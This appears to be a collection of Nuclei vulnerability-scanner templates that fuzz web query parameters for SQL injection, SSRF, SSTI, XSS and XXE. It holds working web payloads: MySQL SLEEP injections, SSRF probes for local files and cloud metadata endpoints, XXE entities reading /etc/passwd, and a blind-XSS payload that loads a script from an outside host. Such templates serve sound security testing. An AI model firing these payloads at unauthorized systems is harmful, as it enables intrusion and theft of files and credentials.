list'" 238 | - "MySqlClient\\." 239 | - "com\\.mysql\\.jdbc" 240 | - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" 241 | - "Pdo[./_\\\\]Mysql" 242 | - "MySqlException" 243 | - "SQLSTATE[\\d+]: Syntax error or access violation" # NOTE: brackets are unescaped here, unlike the matcher's "SQLSTATE\\[\\d+\\]", so "[\\d+]" is a one-character class and this extractor will not label the real "SQLSTATE[42000]" message 244 | 245 | - type: regex 246 | name: mariadb 247 | regex: 248 | - "check the manual that (corresponds to|fits) your MariaDB server version" 249 | 250 | - type: regex 251 | name: drizzel # label typo, intended "drizzle" 252 | regex: 253 | - "check the manual that (corresponds to|fits) your Drizzle server version" 254 | 255 | - type: regex 256 | name: memsql 257 | regex: 258 | - "MemSQL does not support this type of query" 259 | - "is not supported by MemSQL" 260 | - "unsupported nested scalar subselect" 261 | 262 | - type: regex 263 | name: postgresql 264 | regex: 265 | - "PostgreSQL.*?ERROR" 266 | - "Warning.*?\\Wpg_" 267 | - "valid PostgreSQL result" 268 | - "Npgsql\\." 269 | - "PG::SyntaxError:" 270 | - "org\\.postgresql\\.util\\.PSQLException" 271 | - "ERROR:\\s\\ssyntax error at or near" 272 | - "ERROR: parser: parse error at or near" 273 | - "PostgreSQL query failed" 274 | - "org\\.postgresql\\.jdbc" 275 | - "Pdo[./_\\\\]Pgsql" 276 | - "PSQLException" 277 | 278 | - type: regex 279 | name: microsoftsqlserver 280 | regex: 281 | - "Driver.*? SQL[\\-\\_\\ ]*Server" 282 | - "OLE DB.*? SQL Server" 283 | - "\\bSQL Server[^<"]+Driver" 284 | - "Warning.*?\\W(mssql|sqlsrv)_" 285 | - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" 286 | - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" 287 | - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." 
288 | - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" 289 | - "\\[SQL Server\\]" 290 | - "ODBC SQL Server Driver" 291 | - "ODBC Driver \\d+ for SQL Server" 292 | - "SQLServer JDBC Driver" 293 | - "com\\.jnetdirect\\.jsql" 294 | - "macromedia\\.jdbc\\.sqlserver" 295 | - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" 296 | - "com\\.microsoft\\.sqlserver\\.jdbc" 297 | - "Pdo[./_\\\\](Mssql|SqlSrv)" 298 | - "SQL(Srv|Server)Exception" 299 | - "Unclosed quotation mark after the character string" 300 | 301 | - type: regex 302 | name: microsoftaccess 303 | regex: 304 | - "Microsoft Access (\\d+ )?Driver" 305 | - "JET Database Engine" 306 | - "Access Database Engine" 307 | - "ODBC Microsoft Access" 308 | - "Syntax error \\(missing operator\\) in query expression" 309 | 310 | - type: regex 311 | name: oracle 312 | regex: 313 | - "\\bORA-\\d{5}" 314 | - "Oracle error" 315 | - "Oracle.*?Driver" 316 | - "Warning.*?\\W(oci|ora)_" 317 | - "quoted string not properly terminated" 318 | - "SQL command not properly ended" 319 | - "macromedia\\.jdbc\\.oracle" 320 | - "oracle\\.jdbc" 321 | - "Zend_Db_(Adapter|Statement)_Oracle_Exception" 322 | - "Pdo[./_\\\\](Oracle|OCI)" 323 | - "OracleException" 324 | 325 | - type: regex 326 | name: ibmdb2 327 | regex: 328 | - "CLI Driver.*?DB2" 329 | - "DB2 SQL error" 330 | - "\\bdb2_\\w+\\(" 331 | - "SQLCODE[=:\\d, -]+SQLSTATE" 332 | - "com\\.ibm\\.db2\\.jcc" 333 | - "Zend_Db_(Adapter|Statement)_Db2_Exception" 334 | - "Pdo[./_\\\\]Ibm" 335 | - "DB2Exception" 336 | - "ibm_db_dbi\\.ProgrammingError" 337 | 338 | - type: regex 339 | name: informix 340 | regex: 341 | - "Warning.*?\\Wifx_" 342 | - "Exception.*?Informix" 343 | - "Informix ODBC Driver" 344 | - "ODBC Informix driver" 345 | - "com\\.informix\\.jdbc" 346 | - "weblogic\\.jdbc\\.informix" 347 | - "Pdo[./_\\\\]Informix" 348 | - "IfxException" 349 | 350 | - type: regex 351 | name: firebird 352 | regex: 353 | - "Dynamic SQL Error" 354 | - "Warning.*?\\Wibase_" 355 | - 
"org\\.firebirdsql\\.jdbc" 356 | - "Pdo[./_\\\\]Firebird" 357 | 358 | - type: regex 359 | name: sqlite 360 | regex: 361 | - "SQLite/JDBCDriver" 362 | - "SQLite\\.Exception" 363 | - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" 364 | - "Warning.*?\\W(sqlite_|SQLite3::)" 365 | - "\\[SQLITE_ERROR\\]" 366 | - "SQLite error \\d+:" 367 | - "sqlite3.OperationalError:" 368 | - "SQLite3::SQLException" 369 | - "org\\.sqlite\\.JDBC" 370 | - "Pdo[./_\\\\]Sqlite" 371 | - "SQLiteException" 372 | 373 | - type: regex 374 | name: sapmaxdb 375 | regex: 376 | - "SQL error.*?POS([0-9]+)" 377 | - "Warning.*?\\Wmaxdb_" 378 | - "DriverSapDB" 379 | - "-3014.*?Invalid end of SQL statement" 380 | - "com\\.sap\\.dbtech\\.jdbc" 381 | - "\\[-3008\\].*?: Invalid keyword or missing delimiter" 382 | 383 | - type: regex 384 | name: sybase 385 | regex: 386 | - "Warning.*?\\Wsybase_" 387 | - "Sybase message" 388 | - "Sybase.*?Server message" 389 | - "SybSQLException" 390 | - "Sybase\\.Data\\.AseClient" 391 | - "com\\.sybase\\.jdbc" 392 | 393 | - type: regex 394 | name: ingres 395 | regex: 396 | - "Warning.*?\\Wingres_" 397 | - "Ingres SQLSTATE" 398 | - "Ingres\\W.*?Driver" 399 | - "com\\.ingres\\.gcf\\.jdbc" 400 | 401 | - type: regex 402 | name: frontbase 403 | regex: 404 | - "Exception (condition )?\\d+\\. Transaction rollback" 405 | - "com\\.frontbase\\.jdbc" 406 | - "Syntax error 1. Missing" 407 | - "(Semantic|Syntax) error \\[1-4\\]\\d{2}\\." # NOTE: the escaped brackets make "[1-4]" literal text; the matcher above uses the unescaped class "[1-4]\\d{2}" and this extractor should mirror it to label what the matcher detects 
408 | 409 | - type: regex 410 | name: hsqldb 411 | regex: 412 | - "Unexpected end of command in statement \\[" 413 | - "Unexpected token.*?in statement \\[" 414 | - "org\\.hsqldb\\.jdbc" 415 | 416 | - type: regex 417 | name: h2 418 | regex: 419 | - "org\\.h2\\.jdbc" 420 | - "\\[42000-192\\]" 421 | 422 | - type: regex 423 | name: monetdb 424 | regex: 425 | - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" 426 | - "\\[MonetDB\\]\\[ODBC Driver" 427 | - "nl\\.cwi\\.monetdb\\.jdbc" 428 | 429 | - type: regex 430 | name: apachederby 431 | regex: 432 | - "Syntax error: Encountered" 433 | - "org\\.apache\\.derby" 434 | - "ERROR 42X01" 435 | 436 | - type: regex 437 | name: vertica 438 | regex: 439 | - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" 440 | - "/vertica/Parser/scan" 441 | - "com\\.vertica\\.jdbc" 442 | - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" 443 | - "com\\.vertica\\.dsi\\.dataengine" 444 | 445 | - type: regex 446 | name: mckoi 447 | regex: 448 | - "com\\.mckoi\\.JDBCDriver" 449 | - "com\\.mckoi\\.database\\.jdbc" 450 | - "<REGEX_LITERAL>" 451 | 452 | - type: regex 453 | name: presto 454 | regex: 455 | - "com\\.facebook\\.presto\\.jdbc" 456 | - "io\\.prestosql\\.jdbc" 457 | - "com\\.simba\\.presto\\.jdbc" 458 | - "UNION query has different number of fields: \\d+, \\d+" 459 | 460 | - type: regex 461 | name: altibase 462 | regex: 463 | - "Altibase\\.jdbc\\.driver" 464 | 465 | - type: regex 466 | name: mimersql 467 | regex: 468 | - "com\\.mimer\\.jdbc" 469 | - "Syntax error,[^\\n]+assumed to mean" 470 | 471 | - type: regex 472 | name: cratedb 473 | regex: 474 | - "io\\.crate\\.client\\.jdbc" 475 | 476 | - type: regex 477 | name: cache 478 | regex: 479 | - "encountered after end of query" 480 | - "A comparison operator is required here" 481 | 482 | - type: regex 483 | name: raimadatabasemanager 484 | regex: 485 | - "-10048: Syntax error" 486 | - "rdmStmtPrepare\\(.+?\\) returned" 487 | 488 | - type: regex 489 | name: virtuoso 
490 | regex: 491 | - "SQ074: Line \\d+:" 492 | - "SR185: Undefined procedure" 493 | - "SQ200: No table " 494 | - "Virtuoso S0002 Error" 495 | - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" 496 | -------------------------------------------------------------------------------- /sqli/time-based-sqli.yaml: -------------------------------------------------------------------------------- 1 | id: time-based-sqli 2 | 3 | info: 4 | name: Time-Based Blind SQL Injection 5 | author: 0xKayala 6 | severity: critical 7 | description: | 8 | Detects time-based blind SQL injection with MySQL SLEEP(7) payloads. A baseline request (http(1)) must complete in 7 seconds or less before the injected requests are evaluated, and a finding requires the injected response to take between 7 and 16 seconds. The payloads are MySQL-specific, so other engines are not covered, and a single timing hit on a busy backend can still be a false positive worth re-running. 9 | tags: sqli,dast,time-based,blind 10 | 11 | flow: http(1) && http(2) 12 | 13 | http: 14 | - method: GET 15 | path: 16 | - "{{BaseURL}}" 17 | 18 | matchers: 19 | - type: dsl 20 | dsl: 21 | - "duration<=7" # baseline guard: a target that already takes longer than 7s cannot be told apart from a SLEEP(7) hit 22 | 23 | - raw: 24 | - | 25 | @timeout: 20s 26 | GET / HTTP/1.1 27 | Host: {{Hostname}} 28 | 29 | payloads: 30 | injection: 31 | - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" 32 | - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" 33 | - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" 34 | - "if(now()=sysdate(),SLEEP(7),0)" 35 | - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" 36 | - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" 37 | 38 | fuzzing: 39 | - part: query 40 | type: replace 41 | mode: single 42 | fuzz: 43 | - "{{injection}}" 44 | 45 | stop-at-first-match: true 46 | matchers: 47 | - type: dsl 48 | dsl: 49 | - "duration>=7 && duration <=16" 50 | -------------------------------------------------------------------------------- /ssrf/blind-ssrf.yaml: -------------------------------------------------------------------------------- 1 | id: blind-ssrf 2 | 3 | info: 4 | name: Blind SSRF OAST Detection 5 | author: pdteam 6 | severity: medium 7 | metadata: 8 | max-request: 3 9 | tags: ssrf,dast,oast 10 | 11 | http: 12 | - pre-condition: 13 | - type: dsl 14 | dsl: 15 | - 'method == "GET"' 16 | 17 | payloads: 18 | ssrf: 19 | - 
"{{interactsh-url}}" 20 | - "{{FQDN}}.{{interactsh-url}}" 21 | - "{{RDN}}.{{interactsh-url}}" 22 | 23 | fuzzing: 24 | - part: query 25 | mode: single 26 | values: 27 | - "https?://" # Replace parameter values that already hold an http(s) URL with the OAST callback 28 | fuzz: 29 | - "https://{{ssrf}}" 30 | 31 | - part: query 32 | mode: single 33 | values: 34 | - "^[A-Za-z0-9-._]+:[0-9]+$" # Replace bare host:port values with the OAST host on port 80 35 | fuzz: 36 | - "{{ssrf}}:80" 37 | 38 | stop-at-first-match: true 39 | matchers: 40 | - type: word 41 | part: interactsh_protocol # Confirms an HTTP interaction: a DNS-only lookup of the callback does not match, so hits are fewer but higher confidence 42 | words: 43 | - "http" 44 | # digest: 490a00463044022043639a2b3d837698f0ad1d5c78b81a92dc67cfe8ea18afeb57f006cf44e2803902204a61e6eeb0c529913899c9f8aae306dbddcac78f5f41837679b8ba15ada3b5db:922c64590222798bb761d5b6d8e72950 45 | -------------------------------------------------------------------------------- /ssrf/response-ssrf.yaml: -------------------------------------------------------------------------------- 1 | id: response-ssrf 2 | 3 | info: 4 | name: Full Response SSRF Detection 5 | author: pdteam,pwnhxl,j4vaovo 6 | severity: high 7 | reference: 8 | - https://github.com/bugcrowd/HUNT/blob/master/ZAP/scripts/passive/SSRF.py 9 | metadata: 10 | max-request: 12 11 | tags: ssrf,dast 12 | 13 | http: 14 | - pre-condition: 15 | - type: dsl 16 | dsl: 17 | - 'method == "GET"' 18 | 19 | payloads: 20 | ssrf: 21 | - 'http://{{interactsh-url}}' 22 | - 'http://{{FQDN}}.{{interactsh-url}}' 23 | - 'http://{{RDN}}.{{interactsh-url}}' 24 | - 'file:////./etc/./passwd' 25 | - 'file:///c:/./windows/./win.ini' 26 | - 'http://metadata.tencentyun.com/latest/meta-data/' 27 | - 'http://100.100.100.200/latest/meta-data/' 28 | - 'http://169.254.169.254/latest/meta-data/' # AWS-style IMDS; instances enforcing IMDSv2 require a PUT-issued token and will not answer this plain GET 29 | - 'http://169.254.169.254/metadata/v1' 30 | - 'http://127.0.0.1:22' 31 | - 'http://127.0.0.1:3306' 32 | - 'dict://127.0.0.1:6379/info' 33 | 34 | fuzzing: 35 | - part: query 36 | mode: single 37 | keys: 38 | - callback 39 | - continue 40 | - data 41 | - dest 42 | - dir 43 | - domain 44 | 
- feed 45 | - file 46 | - host 47 | - html 48 | - imgurl 49 | - navigation 50 | - next 51 | - open 52 | - out 53 | - page 54 | - path 55 | - port 56 | - redirect 57 | - reference 58 | - return 59 | - show 60 | - site 61 | - to 62 | - uri 63 | - url 64 | - val 65 | - validate 66 | - view 67 | - window 68 | fuzz: 69 | - "{{ssrf}}" 70 | 71 | - part: query 72 | mode: single 73 | values: 74 | - "(https|http|file)(%3A%2F%2F|://)(.*?)" 75 | fuzz: 76 | - "{{ssrf}}" 77 | 78 | stop-at-first-match: true 79 | matchers-condition: or 80 | matchers: 81 | 82 | - type: word 83 | part: body 84 | words: 85 | - "Interactsh Server" 86 | 87 | - type: regex 88 | part: body 89 | regex: 90 | - 'SSH-(\d.\d)-OpenSSH_(\d.\d)' 91 | 92 | - type: regex 93 | part: body 94 | regex: 95 | - '(DENIED Redis|CONFIG REWRITE|NOAUTH Authentication)' 96 | 97 | - type: regex 98 | part: body 99 | regex: 100 | - '(\d.\d.\d)(.*?)mysql_native_password' 101 | 102 | - type: regex 103 | part: body 104 | regex: 105 | - 'root:.*?:[0-9]*:[0-9]*:' 106 | 107 | - type: word 108 | part: body 109 | words: 110 | - 'for 16-bit app support' 111 | 112 | - type: regex 113 | part: body 114 | regex: 115 | - 'dns-conf\/[\s\S]+instance\/' 116 | 117 | - type: regex 118 | part: body 119 | regex: 120 | - 'app-id[\s\S]+placement\/' 121 | 122 | - type: regex 123 | part: body 124 | regex: 125 | - 'ami-id[\s\S]+placement\/' 126 | 127 | - type: regex 128 | part: body 129 | regex: 130 | - 'id[\s\S]+interfaces\/' 131 | # digest: 4a0a00473045022100df5e466f9b2de4655561801dacd8444d412cca9556662839a5955b6c360fe47e022070272a7069a37a5df17d1177769fa87a3c21dcf8b8898e2b36652602d64adc9c:922c64590222798bb761d5b6d8e72950 132 | -------------------------------------------------------------------------------- /ssti/reflection-ssti.yaml: -------------------------------------------------------------------------------- 1 | id: reflection-ssti 2 | 3 | info: 4 | name: Reflected SSTI Arithmetic Based 5 | author: pdteam 6 | severity: medium 7 | reference: 8 | - 
https://github.com/zaproxy/zap-extensions/blob/2d9898900abe85a47b9fe0ceb85ec39070816b98/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/SstiScanRule.java 9 | - https://github.com/DiogoMRSilva/websitesVulnerableToSSTI#list-of-seversneeds-update 10 | metadata: 11 | max-request: 14 12 | tags: ssti,dast 13 | 14 | variables: 15 | first: "{{rand_int(1000, 9999)}}" 16 | second: "{{rand_int(1000, 9999)}}" 17 | result: "{{to_number(first)*to_number(second)}}" 18 | 19 | http: 20 | - pre-condition: 21 | - type: dsl 22 | dsl: 23 | - 'method == "GET"' 24 | 25 | skip-variables-check: true 26 | payloads: 27 | ssti: 28 | - '{{concat("${", "{{first}}*{{second}}", "}")}}' 29 | - '{{concat("{{", "{{first}}*{{second}}", "}}")}}' 30 | - '{{concat("<%=", "{{first}}*{{second}}", "%>")}}' 31 | - '{{concat("{", "{{first}}*{{second}}", "}")}}' 32 | - '{{concat("{{{", "{{first}}*{{second}}", "}}}")}}' 33 | - '{{concat("${{", "{{first}}*{{second}}", "}}")}}' 34 | - '{{concat("#{", "{{first}}*{{second}}", "}")}}' 35 | - '{{concat("[[", "{{first}}*{{second}}", "]]")}}' 36 | - '{{concat("{{=", "{{first}}*{{second}}", "}}")}}' 37 | - '{{concat("[[${", "{{first}}*{{second}}", "}]]")}}' 38 | - '{{concat("${xyz|", "{{first}}*{{second}}", "}")}}' 39 | - '{{concat("#set($x=", "{{first}}*{{second}}", ")${x}")}}' 40 | - '{{concat("@(", "{{first}}*{{second}}", ")")}}' 41 | - '{{concat("{@", "{{first}}*{{second}}", "}")}}' 42 | 43 | fuzzing: 44 | - part: query 45 | type: postfix 46 | fuzz: 47 | - "{{ssti}}" 48 | 49 | stop-at-first-match: true 50 | matchers: 51 | - type: word 52 | part: body 53 | words: 54 | - "{{result}}" 55 | # digest: 4a0a00473045022100d708d1c94470ed6b8905dc03b2e87fd5408f31412d9cb8e002a271e13eae29ed02204c3c34ba3a148255d64a9513e36fe35a57032a0c9c5ede1d1c4d14d7813cc6c4:922c64590222798bb761d5b6d8e72950 56 | -------------------------------------------------------------------------------- /xss/blind-xss.yaml: 
-------------------------------------------------------------------------------- 1 | id: blind-xss 2 | 3 | info: 4 | name: Blind Cross Site Scripting 5 | author: 0xKayala (Satya Prakash) 6 | severity: high 7 | description: This template will spray blind XSS payloads into URLs. Use 'xss.report', 'bxsshunter.com', 'xsshunter.trufflesecurity.com', 'ez.pe' or 'self-hosted server' to check if the payload fired. 8 | tags: xss, blind-xss, dast, bxss, generic 9 | 10 | variables: 11 | first: "{{rand_int(10000, 99999)}}" 12 | script_payload_1: "" 13 | script_payload_2: "\"><41707" 14 | script_payload_3: "" 15 | script_payload_4: "" 16 | script_payload_5: "" 17 | script_payload_6: "" 18 | script_payload_7: "\u0022\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e" 19 | script_payload_8: "%3Cdiv%20id%3D%22load%22%3E%3C%2Fdiv%3E%3Cscript%3Evar%20i%20%3D%20document.createElement%28%27iframe%27%29%3B%20i.style.display%20%3D%20%27none%27%3B%20i.onload%20%3D%20function%28%29%20%7B%20i.contentWindow.location.href%20%3D%20%27%2F%2F0xkayala.github.io/xss-poc.js%27%3B%20%7D%3B%20document.getElementById%28%27load%27%29.appendChild%28i%29%3B%3C%2Fscript%3E" 20 | script_payload_9: "XX">" 21 | 22 | http: 23 | - method: GET 24 | path: 25 | - "{{BaseURL}}" 26 | 27 | payloads: 28 | blind: 29 | - "{{script_payload_1}}" 30 | - "{{script_payload_2}}" 31 | - "{{script_payload_3}}" 32 | - "{{script_payload_4}}" 33 | - "{{script_payload_5}}" 34 | - "{{script_payload_6}}" 35 | - "{{script_payload_7}}" 36 | - "{{script_payload_8}}" 37 | - "{{script_payload_9}}" 38 | 39 | fuzzing: 40 | - part: query 41 | type: postfix 42 | mode: single 43 | fuzz: 44 | - "{{blind}}" 45 | 46 | stop-at-first-match: true 47 | matchers-condition: and 48 | matchers: 49 | - type: word 50 | part: body 51 | words: 52 | - "{{script_payload_1}}" 53 | - "{{script_payload_2}}" 54 | - "{{script_payload_3}}" 55 | - "{{script_payload_4}}" 56 | - "{{script_payload_5}}" 57 | - "{{script_payload_6}}" 
58 | - "{{script_payload_7}}" 59 | - "{{script_payload_8}}" 60 | - "{{script_payload_9}}" 61 | - type: word 62 | part: header 63 | words: 64 | - "text/html" 65 | -------------------------------------------------------------------------------- /xss/dom-xss.yaml: -------------------------------------------------------------------------------- 1 | id: dom-xss 2 | 3 | info: 4 | name: DOM Cross Site Scripting 5 | author: theamanrawat 6 | severity: medium 7 | description: | 8 | Detects DOM-based Cross Site Scripting (XSS) vulnerabilities. 9 | impact: | 10 | Allows attackers to execute malicious scripts in the victim's browser. 11 | remediation: | 12 | Sanitize and validate user input to prevent script injection. 13 | tags: xss,dom,dast,headless 14 | variables: 15 | num: "{{rand_int(10000, 99999)}}" 16 | headless: 17 | - steps: 18 | - action: navigate 19 | args: 20 | url: "{{BaseURL}}" 21 | 22 | - action: waitload 23 | payloads: 24 | reflection: 25 | - "'\">

{{num}}

" 26 | 27 | fuzzing: 28 | - part: query 29 | type: postfix 30 | mode: single 31 | fuzz: 32 | - "{{reflection}}" 33 | 34 | stop-at-first-match: true 35 | matchers-condition: and 36 | matchers: 37 | - type: word 38 | part: body 39 | words: 40 | - "

{{num}}

" 41 | 42 | - type: word 43 | part: header 44 | words: 45 | - "text/html" 46 | # digest: 490a0046304402207fab7c940fcf22142b9d67138f5ab9f0b23ff7990e1a3140a0e427d5040f331b02200c46ebbb04f1cc22da5644e29a7cf09905491c071ee8a80b2cd1070c6772827b:922c64590222798bb761d5b6d8e72950 47 | -------------------------------------------------------------------------------- /xss/reflected-xss.yaml: -------------------------------------------------------------------------------- 1 | id: reflected-xss 2 | 3 | info: 4 | name: Reflected Cross-Site Scripting 5 | author: pdteam,0xKayala 6 | severity: medium 7 | metadata: 8 | max-request: 1 9 | tags: xss,rxss,dast 10 | 11 | variables: 12 | first: "{{rand_int(10000, 99999)}}" 13 | 14 | http: 15 | - pre-condition: 16 | - type: dsl 17 | dsl: 18 | - 'method == "GET"' 19 | 20 | payloads: 21 | reflection: 22 | - "'\"><{{first}}" 23 | - "" 24 | - "" 25 | - "'>" 26 | - "" 27 | - "" 28 | - "" 29 | - "" 30 | - "'>" 31 | - "'\/>" 32 | - "'%3e%3cscript%3ealert({{first}}*{{first}})%3c%2fscript%3eejj4sbx5w4o" 33 | - "Click%20meXSS" 34 | - "\u0022\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e" 35 | - "" 36 | - "%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E" 37 | - "'%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'" 38 | 39 | fuzzing: 40 | - part: query 41 | type: postfix 42 | mode: single 43 | fuzz: 44 | - "{{reflection}}" 45 | 46 | stop-at-first-match: true 47 | matchers-condition: and 48 | matchers: 49 | - type: word 50 | part: body 51 | words: 52 | - "{{reflection}}" 53 | 54 | - type: word 55 | part: header 56 | words: 57 | - "text/html" 58 | # digest: 4b0a00483046022100fe9d1b6a33bc101017c0dabac57b282164ad7a316747fb641b1be7dd534178b2022100b1b90ca968e766279c306212b849ce875ae2beaced34248794387b56192c1878:922c64590222798bb761d5b6d8e72950 59 | -------------------------------------------------------------------------------- /xxe/generic-xxe.yaml: 
-------------------------------------------------------------------------------- 1 | id: generic-xxe 2 | 3 | info: 4 | name: Generic XML external entity (XXE) 5 | author: pwnhxl 6 | severity: medium 7 | reference: 8 | - https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py 9 | metadata: 10 | max-request: 2 11 | tags: dast,xxe 12 | 13 | variables: 14 | rletter: "{{rand_base(6,'abc')}}" 15 | 16 | http: 17 | - pre-condition: 18 | - type: dsl 19 | dsl: 20 | - 'method == "GET"' 21 | 22 | payloads: 23 | xxe: 24 | - ' ]>&{{rletter}};' 25 | - ' ]>&{{rletter}};' 26 | 27 | fuzzing: 28 | - part: query 29 | keys-regex: 30 | - "(.*?)xml(.*?)" 31 | fuzz: 32 | - "{{xxe}}" 33 | 34 | - part: query 35 | values: 36 | - "(" 37 | fuzz: 38 | - "{{xxe}}" 39 | 40 | stop-at-first-match: true 41 | matchers-condition: or 42 | matchers: 43 | - type: regex 44 | name: linux 45 | part: body 46 | regex: 47 | - 'root:.*?:[0-9]*:[0-9]*:' 48 | 49 | - type: word 50 | name: windows 51 | part: body 52 | words: 53 | - 'for 16-bit app support' 54 | # digest: 490a0046304402200765457e7ce86f2875c9b0446d1e4d4a3f035e95c8cb70d2c685bed047e1883c022000fb0dbfce1acce174129de4808904972d457aae4cc27dd68672d8e5a14d49b1:922c64590222798bb761d5b6d8e72950 55 | --------------------------------------------------------------------------------